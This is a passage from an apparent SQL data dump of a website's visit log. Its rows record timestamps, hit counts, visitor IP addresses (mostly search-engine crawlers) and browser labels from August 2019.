.13.176','other'),(443206,1566168302,1,1,0,0,'66.249.66.134','chrome'),(443207,1566169793,1,1,0,0,'180.76.15.32','other'),(443208,1566169947,1,1,0,0,'157.55.39.234','other'),(443209,1566169965,1,1,0,0,'66.249.66.66','chrome'),(443210,1566170303,1,1,0,0,'8.29.198.26','other'),(443211,1566170895,1,1,0,0,'66.249.66.68','chrome'),(443212,1566171404,1,1,0,0,'66.249.66.138','chrome'),(443213,1566172442,1,1,0,0,'8.29.198.27','other'),(443214,1566173323,2,2,0,0,'66.249.66.136','chrome'),(443215,1566174074,1,1,0,0,'66.249.66.68','chrome'),(443216,1566174642,1,1,0,0,'66.249.66.138','chrome'),(443217,1566175266,1,1,0,0,'40.77.167.72','other'),(443218,1566175743,2,2,0,0,'66.249.66.134','chrome'),(443219,1566177477,1,1,0,0,'66.249.66.136','chrome'),(443220,1566178342,2,2,0,0,'40.77.167.111','other'),(443221,1566178963,1,1,0,0,'66.249.66.138','chrome'),(443222,1566179115,1,1,0,0,'66.249.66.66','chrome'),(443223,1566179651,2,2,0,0,'66.249.66.68','chrome'),(443224,1566179715,1,1,0,0,'207.46.13.242','other'),(443225,1566180918,1,1,0,0,'66.249.66.134','chrome'),(443226,1566181144,1,1,0,0,'8.29.198.26','other'),(443227,1566181712,1,1,0,0,'157.55.39.106','other'),(443228,1566181837,1,1,0,0,'157.55.39.134','other'),(443229,1566182381,2,2,0,0,'40.77.167.113','other'),(443230,1566182464,2,2,0,0,'66.249.66.136','chrome'),(443231,1566183043,1,1,0,0,'157.55.39.251','other'),(443232,1566183297,1,1,0,0,'8.29.198.25','other'),(443233,1566183485,1,1,0,0,'66.249.66.66','chrome'),(443234,1566184679,1,1,0,0,'66.249.66.134','chrome'),(443235,1566184734,1,1,0,0,'40.77.167.113','other'),(443236,1566186113,1,1,0,0,'40.77.167.113','other'),(443237,1566186304,1,1,0,0,'66.249.66.136','chrome'),(443238,1566187415,1,1,0,0,'66.249.66.136','chrome'),(443239,1566187491,1,1,0,0,'157.55.39.199','other'),(443240,1566187715,1,1,0,0,'40.77.167.113','other'),(443241,1566188420,1,1,0,0,'66.249.66.68','chrome'),(443242,1566188844,1,1,0,0,'157.55.39.137','other'),(443243,1566188878,1,1,0,0,'213.3.29.239','chrome'),(443244,1566189410,1,1,0,0,'66.249.66.66','chrome'),(443245,1566189745,1,1,0,0,'40.77.167.113','other'),(443246,1566190042,2,1,1,0,'66.249.66.134',''),(443247,1566190997,1,1,0,0,'66.249.66.138','chrome'),(443248,1566191436,2,2,0,0,'66.249.66.134','chrome'),(443249,1566191994,1,1,0,0,'8.29.198.27','other'),(443250,1566192152,1,1,0,0,'66.249.66.136','chrome'),(443251,1566192507,3,3,0,0,'66.249.66.134','chrome'),(443252,1566193328,3,3,0,0,'66.249.66.136','chrome'),(443253,1566193440,1,1,0,0,'89.31.57.5','other'),(443254,1566193603,2,2,0,0,'66.249.66.68','chrome'),(443255,1566194030,2,2,0,0,'40.77.167.113','other'),(443256,1566194044,1,1,0,0,'18.232.171.18','other'),(443257,1566194135,1,1,0,0,'8.29.198.25','other'),(443258,1566195367,1,1,0,0,'66.249.66.64','chrome'),(443259,1566195374,3,3,0,0,'66.249.66.136','chrome'),(443260,1566195649,1,1,0,0,'18.232.171.18','other'),(443261,1566195836,1,1,0,0,'66.249.66.138','chrome'),(443262,1566195846,1,1,0,0,'213.108.45.138','chrome'),(443263,1566196256,1,1,0,0,'207.46.13.160','other'),(443264,1566196840,2,2,0,0,'66.249.66.134','chrome'),(443265,1566197164,1,1,0,0,'66.249.66.138','chrome'),(443266,1566198735,2,2,0,0,'157.55.39.80','other'),(443267,1566199585,1,1,0,0,'207.46.13.62','other'),(443268,1566199590,2,2,0,0,'157.55.39.199','other'),(443269,1566199594,4,4,0,0,'40.77.167.148','other'),(443270,1566200070,1,1,0,0,'66.249.66.138','chrome'),(443271,1566201254,2,2,0,0,'66.249.66.138','chrome'),(443272,1566201447,1,1,0,0,'157.55.39.199','other'),(443273,1566201918,1,1,0,0,'91.124.182.219','chrome'),(443274,1566202705,1,1,0,0,'66.249.66.134','chrome'),(443275,1566202840,1,1,0,0,'8.29.198.26','other'),(443276,1566203759,1,1,0,0,'66.249.66.64','chrome'),(443277,1566204974,1,1,0,0,'8.29.198.27','other'),(443278,1566205491,2,2,0,0,'207.46.13.49','other'),(443279,1566205873,2,2,0,0,'66.249.66.136','chrome'),(443280,1566206379,1,1,0,0,'66.249.66.66','chrome'),(443281,1566208035,1,1,0,0,'66.249.66.136','chrome'),(443282,1566208286,2,2,0,0,'157.55.39.80','other'),(443283,1566208469,2,2,0,0,'207.46.13.62','other'),(443284,1566208727,1,1,0,0,'66.249.66.138','chrome'),(443285,1566208862,1,1,0,0,'66.249.66.134','chrome'),(443286,1566209297,2,2,0,0,'66.249.66.136','chrome'),(443287,1566209529,1,1,0,0,'66.249.66.64','chrome'),(443288,1566209974,1,1,0,0,'66.249.66.66','chrome'),(443289,1566210211,1,1,0,0,'66.249.66.134','chrome'),(443290,1566210232,1,1,0,0,'46.164.130.94','chrome'),(443291,1566210274,2,2,0,0,'157.55.39.107','other'),(443292,1566210280,1,1,0,0,'207.46.13.62','other'),(443293,1566210464,1,1,0,0,'109.74.154.72','chrome'),(443294,1566211537,2,2,0,0,'66.249.66.138','chrome'),(443295,1566211919,1,1,0,0,'193.107.72.125','chrome'),(443296,1566212124,1,1,0,0,'66.249.66.66','chrome'),(443297,1566212810,1,1,0,0,'207.46.13.49','other'),(443298,1566213339,1,1,0,0,'138.246.253.5','chrome'),(443299,1566213691,1,1,0,0,'8.29.198.26','other'),(443300,1566213707,1,1,0,0,'66.249.66.134','chrome'),(443301,1566213729,1,1,0,0,'66.249.66.68','chrome'),(443302,1566213765,4,4,0,0,'66.249.66.136','chrome'),(443303,1566214294,1,1,0,0,'141.8.188.11','other'),(443304,1566214460,1,1,0,0,'66.249.66.66','chrome'),(443305,1566214814,3,3,0,0,'66.249.66.136','chrome'),(443306,1566214901,1,1,0,0,'66.249.66.134','chrome'),(443307,1566215227,1,1,0,0,'141.8.188.29','other'),(443308,1566215799,1,1,0,0,'91.196.178.135','chrome'),(443309,1566215819,1,1,0,0,'8.29.198.27','other'),(443310,1566216085,1,1,0,0,'5.45.207.19','other'),(443311,1566216278,1,1,0,0,'91.196.178.93','firefox'),(443312,1566216912,1,1,0,0,'66.249.66.66','chrome'),(443313,1566216916,2,2,0,0,'141.8.188.29','other'),(443314,1566217070,1,1,0,0,'141.8.188.11','other'),(443315,1566217594,1,1,0,0,'66.249.66.134','chrome'),(443316,1566218590,1,1,0,0,'157.55.39.80','other'),(443317,1566218672,2,2,0,0,'66.249.66.134','chrome'),(443318,1566219601,1,1,0,0,'91.196.179.33','chrome'),(443319,1566220120,1,1,0,0,'46.211.48.145','chrome'),(443320,1566220234,1,1,0,0,'207.46.13.49','other'),(443321,1566220617,1,1,0,0,'66.249.66.136','chrome'),(443322,1566220645,2,2,0,0,'66.249.66.134','chrome'),(443323,1566220974,2,2,0,0,'40.77.167.98','other'),(443324,1566221664,2,2,0,0,'207.46.13.62','other'),(443325,1566222503,2,2,0,0,'40.77.167.98','other'),(443326,1566223219,2,2,0,0,'66.249.66.136','chrome'),(443327,1566223604,1,1,0,0,'66.249.66.64','chrome'),(443328,1566224030,2,2,0,0,'66.249.66.134','chrome'),(443329,1566224119,1,1,0,0,'66.249.66.138','chrome'),(443330,1566224535,1,1,0,0,'8.29.198.25','other'),(443331,1566224869,2,2,0,0,'66.249.66.136','chrome'),(443332,1566224891,1,1,0,0,'207.46.13.126','other'),(443333,1566225057,1,1,0,0,'66.249.66.64','chrome'),(443334,1566225063,1,1,0,0,'66.249.66.66','chrome'),(443335,1566225595,1,1,0,0,'141.8.188.11','other'),(443336,1566225908,1,1,0,0,'66.249.66.68','chrome'),(443337,1566226663,1,1,0,0,'8.29.198.25','other'),(443338,1566226777,1,1,0,0,'66.249.66.134','chrome'),(443339,1566226805,1,1,0,0,'66.249.66.136','chrome'),(443340,1566227024,1,1,0,0,'141.8.188.11','other'),(443341,1566227690,1,1,0,0,'91.209.11.236','other'),(443342,1566227767,2,2,0,0,'141.8.188.29','other'),(443343,1566227880,2,2,0,0,'66.249.66.134','chrome'),(443344,1566227916,1,1,0,0,'66.249.66.136','chrome'),(443345,1566228747,2,2,0,0,'66.249.66.66','chrome'),(443346,1566228775,1,1,0,0,'141.8.188.11','other'),(443347,1566228816,1,1,0,0,'141.8.188.29','other'),(443348,1566230564,1,1,0,0,'207.46.13.234','other'),(443349,1566232706,1,1,0,0,'40.77.167.5','other'),(443350,1566233505,1,1,0,0,'141.8.188.11','other'),(443351,1566234166,1,1,0,0,'66.249.66.138','chrome'),(443352,1566234394,1,1,0,0,'188.40.131.176','chrome'),(443353,1566234641,1,1,0,0,'40.77.167.5','other'),(443354,1566235377,1,1,0,0,'8.29.198.25','other'),(443355,1566235458,1,1,0,0,'66.249.66.138','chrome'),(443356,1566236245,1,1,0,0,'66.249.64.30','chrome'),(443357,1566236815,2,2,0,0,'40.77.167.5','other'),(443358,1566237505,1,1,0,0,'8.29.198.26','other'),(443359,1566237928,2,2,0,0,'207.46.13.95','other'),(443360,1566237975,1,1,0,0,'207.46.13.47','other'),(443361,1566238379,1,1,0,0,'207.46.13.234','other'),(443362,1566239841,1,1,0,0,'207.46.13.47','other'),(443363,1566240346,1,1,0,0,'141.8.183.22','other'),(443364,1566240348,1,1,0,0,'87.250.224.120','other'),(443365,1566240676,102,102,0,0,'172.241.112.83','other'),(443366,1566240993,1,1,0,0,'95.108.213.4','other'),(443367,1566241001,1,1,0,0,'141.8.142.108','other'),(443368,1566241022,1,1,0,0,'141.8.142.103','other'),(443369,1566241592,27,27,0,0,'172.241.112.83','other'),(443370,1566241650,1,1,0,0,'66.249.64.30','chrome'),(443371,1566241870,1,1,0,0,'66.249.64.58','chrome'),(443372,1566242019,82,82,0,0,'148.251.92.39','other'),(443373,1566242814,1,1,0,0,'5.188.84.98','chrome'),(443374,1566242922,95,95,0,0,'148.251.92.39','other'),(443375,1566243240,1,1,0,0,'141.8.142.144','other'),(443376,1566243831,9,9,0,0,'148.251.92.39','other'),(443377,1566244075,2,2,0,0,'207.46.13.47','other'),(443378,1566244081,1,1,0,0,'207.46.13.234','other'),(443379,1566244369,1,1,0,0,'95.108.213.4','other'),(443380,1566244443,1,1,0,0,'91.196.178.49','chrome'),(443381,1566244954,2,2,0,0,'95.213.141.126','opera'),(443382,1566245607,1,1,0,0,'5.45.207.79','other'),(443383,1566245928,2,2,0,0,'207.46.13.234','other'),(443384,1566246232,1,1,0,0,'8.29.198.26','other'),(443385,1566247035,1,1,0,0,'141.8.188.29','other'),(443386,1566247439,1,1,0,0,'207.46.13.95','other'),(443387,1566248350,1,1,0,0,'8.29.198.26','other'),(443388,1566248476,1,1,0,0,'178.63.87.197','other'),(443389,1566248668,1,1,0,0,'141.8.188.11','other'),(443390,1566248718,1,1,0,0,'207.46.13.95','other'),(443391,1566248772,1,1,0,0,'193.70.34.209','chrome'),(443392,1566249657,1,1,0,0,'66.249.64.62','chrome'),(443393,1566250426,1,1,0,0,'5.45.207.79','other'),(443394,1566250982,1,1,0,0,'141.8.188.29','other'),(443395,1566252397,1,1,0,0,'141.8.188.11','other'),(443396,1566253965,1,1,0,0,'207.46.13.147','other'),(443397,1566254324,1,1,0,0,'193.106.30.99','chrome'),(443398,1566255680,1,1,0,0,'207.46.13.95','other'),(443399,1566256208,1,1,0,0,'141.8.188.29','other'),(443400,1566256573,1,1,0,0,'66.249.64.62','chrome'),(443401,1566256896,1,1,0,0,'157.55.39.230','other'),(443402,1566257077,1,1,0,0,'8.29.198.26','other'),(443403,1566257646,1,1,0,0,'141.8.188.11','other'),(443404,1566257748,1,1,0,0,'207.46.13.95','other'),(443405,1566258801,1,1,0,0,'141.8.188.29','other'),(443406,1566259191,1,1,0,0,'8.29.198.25','other'),(443407,1566260656,1,1,0,0,'148.251.52.53','other'),(443408,1566260990,1,1,0,0,'157.55.39.235','other'),(443409,1566261642,2,2,0,0,'141.8.188.29','other'),(443410,1566261866,1,1,0,0,'141.8.188.11','other'),(443411,1566262997,1,1,0,0,'157.55.39.235','other'),(443412,1566263055,1,1,0,0,'207.46.13.119','other'),(443413,1566263620,1,1,0,0,'141.8.142.103','other'),(443414,1566263623,1,1,0,0,'141.8.188.29','other'),(443415,1566264335,1,1,0,0,'157.55.39.235','other'),(443416,1566264448,1,1,0,0,'5.45.207.79','other'),(443417,1566267915,1,1,0,0,'8.29.198.25','other'),(443418,1566268254,1,1,0,0,'141.8.188.29','other'),(443419,1566270034,1,1,0,0,'8.29.198.27','other'),(443420,1566270372,1,1,0,0,'13.66.139.0','other'),(443421,1566271836,1,1,0,0,'157.55.39.180','other'),(443422,1566272589,1,1,0,0,'40.77.167.107','other'),(443423,1566272692,1,1,0,0,'40.77.167.82','other'),(443424,1566273047,1,1,0,0,'91.209.11.236','other'),(443425,1566273132,1,1,0,0,'141.8.188.11','other'),(443426,1566273431,1,1,0,0,'185.230.127.226','chrome'),(443427,1566273941,2,2,0,0,'40.77.167.82','other'),(443428,1566274094,1,1,0,0,'157.55.39.180','other'),(443429,1566274967,1,1,0,0,'141.8.188.29','other'),(443430,1566275458,1,1,0,0,'40.77.167.107','other'),(443431,1566276290,1,1,0,0,'5.188.84.88','chrome'),(443432,1566276820,1,1,0,0,'141.8.188.11','other'),(443433,1566277760,1,1,0,0,'40.77.167.7','other'),(443434,1566278275,1,1,0,0,'157.55.39.180','other'),(443435,1566278751,1,1,0,0,'8.29.198.27','other'),(443436,1566279240,1,1,0,0,'40.77.167.107','other'),(443437,1566279954,1,1,0,0,'141.8.188.29','other'),(443438,1566280162,1,1,0,0,'92.113.156.166','chrome'),(443439,1566280256,1,1,0,0,'91.209.11.236','other'),(443440,1566280597,1,1,0,0,'157.55.39.180','other'),(443441,1566280894,1,1,0,0,'8.29.198.26','other'),(443442,1566281099,1,1,0,0,'157.55.39.111','other'),(443443,1566283396,2,2,0,0,'141.8.188.11','other'),(443444,1566285861,2,2,0,0,'207.46.13.9','other'),(443445,1566285934,1,1,0,0,'141.8.142.38','other'),(443446,1566287370,1,1,0,0,'157.55.39.111','other'),(443447,1566289221,1,1,0,0,'193.106.30.99','chrome'),(443448,1566289478,1,1,0,0,'141.8.188.11','other'),(443449,1566289608,1,1,0,0,'8.29.198.27','other'),(443450,1566289960,2,2,0,0,'141.8.188.29','other'),(443451,1566290612,1,1,0,0,'46.188.98.10','chrome'),(443452,1566291729,1,1,0,0,'157.55.39.111','other'),(443453,1566291741,1,1,0,0,'8.29.198.26','other'),(443454,1566295591,1,1,0,0,'109.74.154.72','chrome'),(443455,1566296110,2,2,0,0,'94.100.221.234','chrome'),(443456,1566297716,1,1,0,0,'141.8.188.29','other'),(443457,1566298516,1,1,0,0,'141.8.188.11','other'),(443458,1566298945,1,1,0,0,'40.77.167.172','other'),(443459,1566300017,1,1,0,0,'46.201.104.217','chrome'),(443460,1566300470,1,1,0,0,'8.29.198.27','other'),(443461,1566300837,1,1,0,0,'46.211.66.48','chrome'),(443462,1566300903,1,1,0,0,'141.8.188.11','other'),(443463,1566301517,1,1,0,0,'91.196.178.169','chrome'),(443464,1566302146,1,1,0,0,'54.208.102.37','other'),(443465,1566302148,1,1,0,0,'107.21.1.8','other'),(443466,1566302598,1,1,0,0,'8.29.198.25','other'),(443467,1566303131,1,1,0,0,'157.55.39.111','other'),(443468,1566304862,1,1,0,0,'157.55.39.111','other'),(443469,1566304919,1,1,0,0,'91.196.178.87','chrome'),(443470,1566307876,1,1,0,0,'157.55.39.111','other'),(443471,1566308992,1,1,0,0,'40.77.167.172','other'),(443472,1566309188,1,1,0,0,'91.196.178.186','chrome'),(443473,1566310607,1,1,0,0,'66.249.64.31','chrome'),(443474,1566311111,1,1,0,0,'207.46.13.86','other'),(443475,1566311328,1,1,0,0,'8.29.198.26','other'),(443476,1566311388,1,1,0,0,'157.55.39.122','other'),(443477,1566312396,1,1,0,0,'193.106.30.99','chrome'),(443478,1566312639,1,1,0,0,'130.180.218.233','chrome'),(443479,1566313174,1,1,0,0,'40.77.167.23','other'),(443480,1566313455,1,1,0,0,'8.29.198.26','other'),(443481,1566314330,1,1,0,0,'138.246.253.5','chrome'),(443482,1566314380,1,1,0,0,'92.113.156.166','chrome'),(443483,1566315466,1,1,0,0,'207.46.13.86','other'),(443484,1566316162,1,1,0,0,'40.77.167.197','other'),(443485,1566316476,1,1,0,0,'40.77.167.23','other'),(443486,1566317735,2,2,0,0,'40.77.167.172','other'),(443487,1566318269,1,1,0,0,'13.66.139.0','other'),(443488,1566318705,1,1,0,0,'40.77.167.197','other'),(443489,1566318931,1,1,0,0,'46.211.65.72','chrome'),(443490,1566320962,1,1,0,0,'46.4.120.42','chrome'),(443491,1566321037,2,2,0,0,'40.77.167.197','other'),(443492,1566322172,1,1,0,0,'8.29.198.27','other'),(443493,1566322389,1,1,0,0,'207.102.138.11','other'),(443494,1566323599,1,1,0,0,'207.46.13.61','other'),(443495,1566324294,1,1,0,0,'8.29.198.27','other'),(443496,1566325410,1,1,0,0,'207.46.13.61','other'),(443497,1566326227,1,1,0,0,'40.77.167.23','other'),(443498,1566327205,1,1,0,0,'207.46.13.242','other'),(443499,1566327497,1,1,0,0,'207.46.13.61','other'),(443500,1566328284,1,1,0,0,'40.77.167.23','other'),(443501,1566328616,1,1,0,0,'66.249.64.30','chrome'),(443502,1566330248,1,1,0,0,'91.196.178.170','chrome'),(443503,1566330360,2,2,0,0,'66.249.66.134','chrome'),(443504,1566330385,2,2,0,0,'66.249.66.136','chrome'),(443505,1566330602,1,1,0,0,'70.36.114.122','chrome'),(443506,1566330790,2,1,1,0,'66.249.64.58',''),(443507,1566330803,1,1,0,0,'207.46.13.45','other'),(443508,1566331987,1,1,0,0,'207.46.13.61','other'),(443509,1566333038,1,1,0,0,'8.29.198.27','other'),(443510,1566333069,1,1,0,0,'207.46.13.153','other'),(443511,1566333536,1,1,0,0,'66.249.66.134','chrome'),(443512,1566335133,1,1,0,0,'8.29.198.26','other'),(443513,1566337764,1,1,0,0,'207.46.13.122','other'),(443514,1566337992,1,1,0,0,'207.46.13.164','other'),(443515,1566338150,3,3,0,0,'207.46.13.242','other'),(443516,1566338710,1,1,0,0,'141.8.188.29','other'),(443517,1566339168,2,2,0,0,'207.46.13.242','other'),(443518,1566341836,1,1,0,0,'207.46.13.122','other'),(443519,1566343365,2,2,0,0,'207.46.13.242','other'),(443520,1566343901,1,1,0,0,'8.29.198.27','other'),(443521,1566344817,1,1,0,0,'66.249.66.138','chrome'),(443522,1566345977,1,1,0,0,'8.29.198.27','other'),(443523,1566346983,1,1,0,0,'66.249.66.134','chrome'),(443524,1566347258,1,1,0,0,'39.104.180.138','other'),(443525,1566351350,2,2,0,0,'207.46.13.19','other'),(443526,1566351710,1,1,0,0,'66.249.66.66','chrome'),(443527,1566351880,1,1,0,0,'157.55.39.118','other'),(443528,1566352694,1,1,0,0,'207.46.13.19','other'),(443529,1566352768,1,1,0,0,'207.46.13.122','other'),(443530,1566352873,1,1,0,0,'64.246.165.170','firefox'),(443531,1566353152,1,1,0,0,'157.55.39.90','other'),(443532,1566354761,1,1,0,0,'8.29.198.27','other'),(443533,1566355304,1,1,0,0,'157.55.39.59','other'),(443534,1566356823,1,1,0,0,'8.29.198.26','other'),(443535,1566356908,1,1,0,0,'193.106.30.99','chrome'),(443536,1566358688,1,1,0,0,'51.68.152.26','chrome'),(443537,1566359446,1,1,0,0,'157.55.39.22','other'),(443538,1566359467,1,1,0,0,'141.8.188.11','other'),(443539,1566360303,3,3,0,0,'141.8.188.29','other'),(443540,1566360591,1,1,0,0,'207.46.13.11','other'),(443541,1566362122,1,1,0,0,'141.8.188.29','other'),(443542,1566362748,1,1,0,0,'40.77.167.98','other'),(443543,1566362966,1,1,0,0,'66.249.66.136','chrome'),(443544,1566362968,1,1,0,0,'157.55.39.22','other'),(443545,1566364223,1,1,0,0,'141.8.188.29','other'),(443546,1566365637,1,1,0,0,'8.29.198.25','other'),(443547,1566366215,2,2,0,0,'141.8.188.11','other'),(443548,1566366705,1,1,0,0,'91.196.178.166','chrome'),(443549,1566367147,2,2,0,0,'141.8.188.29','other'),(443550,1566367656,1,1,0,0,'8.29.198.27','other'),(443551,1566369717,1,1,0,0,'91.196.178.104','chrome'),(443552,1566369961,1,1,0,0,'157.55.39.22','other'),(443553,1566370222,1,1,0,0,'40.77.167.98','other'),(443554,1566370397,1,1,0,0,'141.8.188.11','other'),(443555,1566370746,1,1,0,0,'62.210.37.15','other'),(443556,1566371115,1,1,0,0,'66.249.66.134','chrome'),(443557,1566371366,1,0,1,0,'66.249.66.136',''),(443558,1566372304,4,4,0,0,'40.77.167.98','other'),(443559,1566372887,1,1,0,0,'141.8.188.29','other'),(443560,1566373118,1,1,0,0,'157.55.39.22','other'),(443561,1566373785,1,1,0,0,'91.196.179.134','chrome'),(443562,1566374202,1,1,0,0,'46.211.102.139','chrome'),(443563,1566374808,1,1,0,0,'141.8.142.103','other'),(443564,1566374895,1,1,0,0,'141.8.188.29','other'),(443565,1566375858,1,1,0,0,'141.8.188.11','other'),(443566,1566375973,1,1,0,0,'91.196.179.134','chrome'),(443567,1566376488,1,1,0,0,'8.29.198.25','other'),(443568,1566376764,1,1,0,0,'141.8.188.11','other'),(443569,1566376781,2,2,0,0,'141.8.188.29','other'),(443570,1566377883,1,1,0,0,'141.8.188.29','other'),(443571,1566378495,1,1,0,0,'8.29.198.26','other'),(443572,1566379378,1,1,0,0,'207.46.13.95','other'),(443573,1566379529,1,1,0,0,'40.77.167.98','other'),(443574,1566379854,1,1,0,0,'40.77.167.92','other'),(443575,1566380006,1,1,0,0,'157.55.39.85','other'),(443576,1566380732,1,1,0,0,'130.180.220.211','chrome'),(443577,1566381062,1,1,0,0,'141.8.142.108','other'),(443578,1566381336,1,1,0,0,'40.77.167.125','other'),(443579,1566381444,1,1,0,0,'141.8.188.11','other'),(443580,1566382172,1,1,0,0,'141.8.188.29','other'),(443581,1566382886,1,1,0,0,'66.249.66.134','chrome'),(443582,1566383217,1,1,0,0,'109.74.154.72','chrome'),(443583,1566384047,1,1,0,0,'38.99.62.94','other'),(443584,1566384082,2,2,0,0,'95.213.141.126','opera'),(443585,1566384265,1,1,0,0,'91.196.178.102','chrome'),(443586,1566384870,1,1,0,0,'157.55.39.173','other'),(443587,1566385260,1,1,0,0,'5.58.76.163','chrome'),(443588,1566385533,1,1,0,0,'66.249.66.134','chrome'),(443589,1566385609,1,1,0,0,'95.108.213.4','other'),(443590,1566386747,1,1,0,0,'195.162.90.62','chrome'),(443591,1566387064,1,1,0,0,'13.66.139.0','other'),(443592,1566387335,1,1,0,0,'8.29.198.26','other'),(443593,1566387360,1,1,0,0,'209.17.96.170','other'),(443594,1566387956,1,1,0,0,'3.214.21.251','firefox'),(443595,1566388663,1,1,0,0,'66.249.66.134','chrome'),(443596,1566388968,1,1,0,0,'91.196.178.85','chrome'),(443597,1566388978,1,1,0,0,'66.249.66.138','chrome'),(443598,1566389018,1,1,0,0,'91.196.178.87','chrome'),(443599,1566389345,1,1,0,0,'8.29.198.25','other'),(443600,1566389402,1,1,0,0,'5.58.76.163','chrome'),(443601,1566389908,1,1,0,0,'209.17.96.138','other'),(443602,1566390124,1,1,0,0,'141.8.188.29','other'),(443603,1566390610,1,1,0,0,'157.55.39.173','other'),(443604,1566391537,1,1,0,0,'157.55.39.194','other'),(443605,1566393769,2,2,0,0,'141.8.188.11','other'),(443606,1566394023,1,1,0,0,'157.55.39.173','other'),(443607,1566394320,1,1,0,0,'66.249.66.136','chrome'),(443608,1566394333,1,1,0,0,'66.249.66.66','chrome'),(443609,1566394769,1,1,0,0,'157.55.39.194','other'),(443610,1566394899,1,1,0,0,'141.8.188.29','other'),(443611,1566395557,2,2,0,0,'141.8.188.11','other'),(443612,1566396503,1,1,0,0,'66.249.66.136','chrome'),(443613,1566396686,1,1,0,0,'141.8.188.11','other'),(443614,1566396701,1,1,0,0,'95.108.213.4','other'),(443615,1566397341,1,1,0,0,'66.249.66.68','chrome'),(443616,1566397956,1,1,0,0,'66.249.66.136','chrome'),(443617,1566398086,1,1,0,0,'66.249.66.138','chrome'),(443618,1566398175,1,1,0,0,'157.55.39.224','other'),(443619,1566398201,1,1,0,0,'8.29.198.27','other'),(443620,1566398597,1,1,0,0,'141.8.188.11','other'),(443621,1566398754,1,1,0,0,'95.132.55.229','chrome'),(443622,1566399027,1,1,0,0,'66.249.66.64','chrome'),(443623,1566399453,1,1,0,0,'40.77.167.51','other'),(443624,1566399552,1,1,0,0,'157.55.39.173','other'),(443625,1566399615,1,1,0,0,'40.77.167.59','other'),(443626,1566399832,1,1,0,0,'66.249.66.138','chrome'),(443627,1566400201,1,1,0,0,'8.29.198.25','other'),(443628,1566400202,1,1,0,0,'66.249.66.68','chrome'),(443629,1566401179,1,1,0,0,'66.249.66.134','chrome'),(443630,1566401842,1,1,0,0,'66.249.66.138','chrome'),(443631,1566402015,1,1,0,0,'95.134.220.176','chrome'),(443632,1566402714,1,1,0,0,'5.45.207.19','other'),(443633,1566402903,1,1,0,0,'66.249.66.134','chrome'),(443634,1566402936,2,2,0,0,'66.249.66.136','chrome'),(443635,1566403318,2,2,0,0,'66.249.66.138','chrome'),(443636,1566403969,1,1,0,0,'42.113.173.124','chrome'),(443637,1566404050,1,1,0,0,'66.249.66.136','chrome'),(443638,1566404079,1,1,0,0,'66.249.66.134','chrome'),(443639,1566405415,2,2,0,0,'66.249.66.134','chrome'),(443640,1566405806,1,1,0,0,'141.8.188.11','other'),(443641,1566405950,1,1,0,0,'40.77.167.59','other'),(443642,1566406592,1,1,0,0,'5.45.207.19','other'),(443643,1566406980,1,1,0,0,'66.249.66.134','chrome'),(443644,1566407102,1,1,0,0,'66.249.66.138','chrome'),(443645,1566407515,1,1,0,0,'66.249.66.136','chrome'),(443646,1566407645,1,1,0,0,'141.8.188.29','other'),(443647,1566408471,1,1,0,0,'157.55.39.194','other'),(443648,1566409066,1,1,0,0,'8.29.198.27','other'),(443649,1566409673,3,3,0,0,'66.249.66.138','chrome'),(443650,1566409858,1,1,0,0,'66.249.66.64','chrome'),(443651,1566410003,4,4,0,0,'66.249.66.134','chrome'),(443652,1566410154,3,3,0,0,'66.249.66.136','chrome'),(443653,1566410159,1,1,0,0,'66.249.66.66','chrome'),(443654,1566410287,1,1,0,0,'141.8.188.11','other'),(443655,1566410764,1,1,0,0,'66.249.66.138','chrome'),(443656,1566410849,1,1,0,0,'66.249.66.68','chrome'),(443657,1566411045,1,1,0,0,'8.29.198.26','other'),(443658,1566411205,1,1,0,0,'66.249.66.66','chrome'),(443659,1566411315,2,2,0,0,'157.55.39.113','other'),(443660,1566411393,1,1,0,0,'141.8.188.29','other'),(443661,1566411415,1,1,0,0,'207.46.13.130','other'),(443662,1566411798,2,2,0,0,'66.249.66.134','chrome'),(443663,1566411990,2,2,0,0,'66.249.66.136','chrome'),(443664,1566412385,1,1,0,0,'3.214.21.251','firefox'),(443665,1566412952,1,1,0,0,'40.77.167.59','other'),(443666,1566413741,1,1,0,0,'167.71.68.78','chrome'),(443667,1566413830,2,2,0,0,'141.8.188.29','other'),(443668,1566414118,2,2,0,0,'66.249.66.138','chrome'),(443669,1566414155,1,1,0,0,'95.108.181.75','other'),(443670,1566414616,2,2,0,0,'66.249.66.134','chrome'),(443671,1566414821,1,1,0,0,'66.249.66.68','chrome'),(443672,1566414899,1,1,0,0,'66.249.66.136','chrome'),(443673,1566415893,2,2,0,0,'66.249.66.136','chrome'),(443674,1566415898,1,1,0,0,'66.249.66.66','chrome'),(443675,1566416078,2,2,0,0,'66.249.66.134','chrome'),(443676,1566416384,2,2,0,0,'66.249.66.138','chrome'),(443677,1566417713,1,1,0,0,'95.108.181.54','other'),(443678,1566417790,1,1,0,0,'66.249.66.134','chrome'),(443679,1566417921,1,1,0,0,'95.84.186.86','chrome'),(443680,1566418274,1,1,0,0,'207.46.13.130','other'),(443681,1566418638,2,2,0,0,'141.8.188.29','other'),(443682,1566419035,2,2,0,0,'66.249.66.136','chrome'),(443683,1566419142,2,2,0,0,'66.249.66.138','chrome'),(443684,1566419156,3,3,0,0,'66.249.66.134','chrome'),(443685,1566419668,1,1,0,0,'141.8.188.29','other'),(443686,1566419883,1,1,0,0,'66.249.66.68','chrome'),(443687,1566419912,1,1,0,0,'8.29.198.26','other'),(443688,1566420616,1,1,0,0,'66.249.66.138','chrome'),(443689,1566420983,1,1,0,0,'66.249.66.64','chrome'),(443690,1566421003,2,2,0,0,'66.249.66.136','chrome'),(443691,1566421011,1,1,0,0,'66.249.66.134','chrome'),(443692,1566421888,1,1,0,0,'8.29.198.26','other'),(443693,1566423517,1,1,0,0,'141.8.188.29','other'),(443694,1566423554,1,1,0,0,'66.249.66.138','chrome'),(443695,1566423566,1,1,0,0,'193.106.30.99','chrome'),(443696,1566423637,1,1,0,0,'66.249.66.136','chrome'),(443697,1566424889,1,1,0,0,'207.46.13.160','other'),(443698,1566425208,1,1,0,0,'5.45.207.19','other'),(443699,1566427825,1,1,0,0,'178.154.171.27','other'),(443700,1566428106,1,1,0,0,'207.46.13.90','other'),(443701,1566428293,1,1,0,0,'207.46.13.162','other'),(443702,1566428384,1,1,0,0,'207.46.13.160','other'),(443703,1566429253,1,1,0,0,'141.8.188.29','other'),(443704,1566429356,1,1,0,0,'66.249.66.138','chrome'),(443705,1566430446,1,1,0,0,'5.45.207.19','other'),(443706,1566430602,1,1,0,0,'207.46.13.162','other'),(443707,1566430763,1,1,0,0,'8.29.198.27','other'),(443708,1566431313,1,1,0,0,'13.66.139.0','other'),(443709,